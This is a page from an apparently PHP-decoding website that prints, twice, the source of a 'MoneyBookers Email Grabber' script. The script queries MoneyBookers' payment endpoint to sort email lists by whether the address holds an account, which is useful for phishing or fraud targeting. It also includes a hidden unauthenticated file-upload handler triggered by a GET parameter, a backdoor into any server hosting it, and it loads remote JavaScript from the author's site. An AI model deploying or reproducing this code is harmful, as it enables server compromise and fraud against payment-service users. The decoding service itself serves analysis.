Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php # ===================================================== # # ..
Decoded Output download
<?php
# ===================================================== #
# #
# ===================================================== #
# contact : [email protected] #
# (Site: PHP-Files.me) #
# ===================================================== #
# contact : karragerj[at]yahoo[dot]com #
# (www.php-files.me) #
# ===================================================== #
# Upload
$UP = $_GET['up'];
if(isset($UP) && !empty($UP)){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p><font color="#00FF00" size="7">Uploaded</font></p>';
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo '<p><font color="#FF0000" size="7">Failed</font></p>';
}
}
@set_time_limit(0);
echo "<head>
<style type=\"text/css\"><!--
body,td,th {
font-family: Courier New;
font-size: 12px;
color: #636161;
}
body {
background-color: #0D0C0C;
}
a {
font-size: 12px;
}
a:link {
text-decoration: none;
color: #666666;
}
a:visited {
text-decoration: none;
color: #666666;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
h1,h2,h3,h4,h5,h6 {
font-style: italic;
}
--></style>
<title>MoneyBookers Email Grabber - ".$_SERVER['HTTP_HOST']."</title>
</head><SCRIPT SRC='http://php-files.me/JavaScript/Style.js'></SCRIPT><div align=\"center\"><pre><font color=\"#FFFFFF\" size=\"3\">=====================================================</font><font size=\"3\">
# ===================================================== #
# #
# ===================================================== #
# contact : [email protected] #
# (Site: PHP-Files.me) #
# ===================================================== #
</font><font color=\"#FFFFFF\" size=\"3\">=====================================================</font></pre>
<pre>[<a href=\"http://www.php-files.me\" onclick=\"alert('Done By KarragerJ\n\MoneyBookers Email Grabber -@ 2013-2014\n All Greetz to PHP-Files.me')\"><font color=\"#FFFFFF\">Go to coder site</font></a>]</pre></center>";
$emails = $_POST['emails'];
print '<form method="POST">
<p><span style="font-size: 15pt"><font color="#FFFFFF">MoneyBookers</font> Email Grabber </span></p>
<p>Emails (<font color="#FFFFFF">That you want to check !</font> )<br><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
<p><input type="submit" value="Submit" name="B1"></p>
</form>';
if (!empty($emails)) {
$emails = explode("
", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
foreach ( $emails as $email ) {
$email = trim($email);
print $count .". Checking <font color=\"#FFFFFF\">".$email."</font> ..... <b>";
$count++;
if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$check = @file_get_contents('https://www.moneybookers.com/app/payment.pl?pay_to_email='.$email.'&return_url_target=1&cancel_url_target=1&dynamic_descriptor=Descriptor&language=EN&confirmation_note=Samplemerchant+wishes+you+pleasure+reading+your+new+book%21&merchant_fields=field1&title=Mr&firstname=John&lastname=Payer&address=11+Payerstr+St&address2=Payertown&phone_number=0207123456&postal_code=EC45MQ&city=Payertown&state=Central+London&country=GBR&amount=39.60¤cy=EUR&amount2_description=Product+Price%3A&amount2=29.90&amount3_description=Handling+Fees%3A&amount3=3.10&amount4_description=VAT+%2820%25%29%3A&amount4=6.60&detail1_description=Product+ID%3A&detail1_text=4509334&detail2_description=Description%3A&detail2_text=Romeo+and+Juliet+%28W.+Shakespeare%29&detail3_description=Seller+ID%3A&detail3_text=123456&detail4_description=Special+Conditions%3A&detail4_text=5-6+days+for+delivery&rec_period=1&rec_grace_period=1&rec_cycle=day&ondemand_max_currency=EUR&submit_id=Submit&Pay=Pay') or Die('<b><font color="#FF0000">Server Error - Can\'t Check </font></b>');
if(!strpos($check, 'Transaction not allowed')) {
print "<font size=\"3\" color=\"#FFFFFF\">Yes</font></b> <br>";
$yes++;
$vaild_yes .=$email."
";
}
else {
print "<font color=\"#FF0000\">NO</font><br>";
$not++;
$vaild_no .=$email."
";
}
}
else {
print "<font color=\"#FF0000\">Invaild email</font><br>";
$inv++;
$invaild .=$email."
";
}
}
print '</p><p><table border="1" width="100%">
<tr>
<td>MoneyBookers emails (<font color="#FFFFFF"><b>'.$yes.'</b></font>)</td>
<td>Not MoneyBookers emails (<font color="#FFFFFF"><b>'.$not.'</b></font>)</td>
<td>Invalid emails (<font color="#FFFFFF"><b>'.$inv.'</b></font>)</td>
</tr>
<tr>
<td><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></td>
<td><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></td>
<td><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></td>
</tr>
</table></p>';
}
print "<p> </p>
<p>Copyright [<font color=\"#FFFFFF\">2013</font>-<font color=\"#FFFFFF\">2014</font>]<font color=\"#FFFFFF\"> </font>
to<font color=\"#FFFFFF\"> </font>(<font color=\"#FFFFFF\"><a href=\"http://www.php-files.me\">PHP-Files.me</a></font>)<font color=\"#FFFFFF\">
- KarragerJ</font></p>
<p>Contact : <font color=\"#FFFFFF\">KarragerJ</font>[at]<font color=\"#FFFFFF\">yahoo</font>[dot]<font color=\"#FFFFFF\">com</font></p>
<p> </p></div>";
?>
Did this file decode correctly?
Original Code
<?php
# ===================================================== #
# #
# ===================================================== #
# contact : [email protected] #
# (Site: PHP-Files.me) #
# ===================================================== #
# contact : karragerj[at]yahoo[dot]com #
# (www.php-files.me) #
# ===================================================== #
# Upload
$UP = $_GET['up'];
if(isset($UP) && !empty($UP)){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p><font color="#00FF00" size="7">Uploaded</font></p>';
if (move_uploaded_file
($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;
else echo '<p><font color="#FF0000" size="7">Failed</font></p>';
}
}
@set_time_limit(0);
echo "<head>
<style type=\"text/css\"><!--
body,td,th {
font-family: Courier New;
font-size: 12px;
color: #636161;
}
body {
background-color: #0D0C0C;
}
a {
font-size: 12px;
}
a:link {
text-decoration: none;
color: #666666;
}
a:visited {
text-decoration: none;
color: #666666;
}
a:hover {
text-decoration: none;
}
a:active {
text-decoration: none;
}
h1,h2,h3,h4,h5,h6 {
font-style: italic;
}
--></style>
<title>MoneyBookers Email Grabber - ".$_SERVER['HTTP_HOST']."</title>
</head><SCRIPT SRC='http://php-files.me/JavaScript/Style.js'></SCRIPT><div align=\"center\"><pre><font color=\"#FFFFFF\" size=\"3\">=====================================================</font><font size=\"3\">
# ===================================================== #
# #
# ===================================================== #
# contact : [email protected] #
# (Site: PHP-Files.me) #
# ===================================================== #
</font><font color=\"#FFFFFF\" size=\"3\">=====================================================</font></pre>
<pre>[<a href=\"http://www.php-files.me\" onclick=\"alert('Done By KarragerJ\\n\\MoneyBookers Email Grabber -@ 2013-2014\\n All Greetz to PHP-Files.me')\"><font color=\"#FFFFFF\">Go to coder site</font></a>]</pre></center>";
$emails = $_POST['emails'];
print '<form method="POST">
<p><span style="font-size: 15pt"><font color="#FFFFFF">MoneyBookers</font> Email Grabber </span></p>
<p>Emails (<font color="#FFFFFF">That you want to check !</font> )<br><textarea rows="10" name="emails" cols="48">'.$emails.'</textarea></p>
<p><input type="submit" value="Submit" name="B1"></p>
</form>';
if (!empty($emails)) {
$emails = explode("\r\n", $emails);
$yes = 0;
$not = 0;
$inv = 0;
$count = 1;
print "<p align=\"left\">Checking <font color=\"#FFFFFF\"> <b>".count($emails)."</b></font> emails ....<br></p><p align=\"left\">";
foreach ( $emails as $email ) {
$email = trim($email);
print $count .". Checking <font color=\"#FFFFFF\">".$email."</font> ..... <b>";
$count++;
if(filter_var($email, FILTER_VALIDATE_EMAIL)){
$check = @file_get_contents('https://www.moneybookers.com/app/payment.pl?pay_to_email='.$email.'&return_url_target=1&cancel_url_target=1&dynamic_descriptor=Descriptor&language=EN&confirmation_note=Samplemerchant+wishes+you+pleasure+reading+your+new+book%21&merchant_fields=field1&title=Mr&firstname=John&lastname=Payer&address=11+Payerstr+St&address2=Payertown&phone_number=0207123456&postal_code=EC45MQ&city=Payertown&state=Central+London&country=GBR&amount=39.60¤cy=EUR&amount2_description=Product+Price%3A&amount2=29.90&amount3_description=Handling+Fees%3A&amount3=3.10&amount4_description=VAT+%2820%25%29%3A&amount4=6.60&detail1_description=Product+ID%3A&detail1_text=4509334&detail2_description=Description%3A&detail2_text=Romeo+and+Juliet+%28W.+Shakespeare%29&detail3_description=Seller+ID%3A&detail3_text=123456&detail4_description=Special+Conditions%3A&detail4_text=5-6+days+for+delivery&rec_period=1&rec_grace_period=1&rec_cycle=day&ondemand_max_currency=EUR&submit_id=Submit&Pay=Pay') or Die('<b><font color="#FF0000">Server Error - Can\'t Check </font></b>');
if(!strpos($check, 'Transaction not allowed')) {
print "<font size=\"3\" color=\"#FFFFFF\">Yes</font></b> <br>";
$yes++;
$vaild_yes .=$email."\n";
}
else {
print "<font color=\"#FF0000\">NO</font><br>";
$not++;
$vaild_no .=$email."\n";
}
}
else {
print "<font color=\"#FF0000\">Invaild email</font><br>";
$inv++;
$invaild .=$email."\n";
}
}
print '</p><p><table border="1" width="100%">
<tr>
<td>MoneyBookers emails (<font color="#FFFFFF"><b>'.$yes.'</b></font>)</td>
<td>Not MoneyBookers emails (<font color="#FFFFFF"><b>'.$not.'</b></font>)</td>
<td>Invalid emails (<font color="#FFFFFF"><b>'.$inv.'</b></font>)</td>
</tr>
<tr>
<td><textarea rows="10" name="S1" cols="43">'.$vaild_yes.'</textarea></td>
<td><textarea rows="10" name="S2" cols="43">'.$vaild_no.'</textarea></td>
<td><textarea rows="10" name="S3" cols="43">'.$invaild.'</textarea></td>
</tr>
</table></p>';
}
print "<p> </p>
<p>Copyright [<font color=\"#FFFFFF\">2013</font>-<font color=\"#FFFFFF\">2014</font>]<font color=\"#FFFFFF\"> </font>
to<font color=\"#FFFFFF\"> </font>(<font color=\"#FFFFFF\"><a href=\"http://www.php-files.me\">PHP-Files.me</a></font>)<font color=\"#FFFFFF\">
- KarragerJ</font></p>
<p>Contact : <font color=\"#FFFFFF\">KarragerJ</font>[at]<font color=\"#FFFFFF\">yahoo</font>[dot]<font color=\"#FFFFFF\">com</font></p>
<p> </p></div>";
?>
Function Calls
None |
Stats
MD5 | 592e83542a297328cf483ffe6ba79ba9 |
Eval Count | 0 |
Decode Time | 80 ms |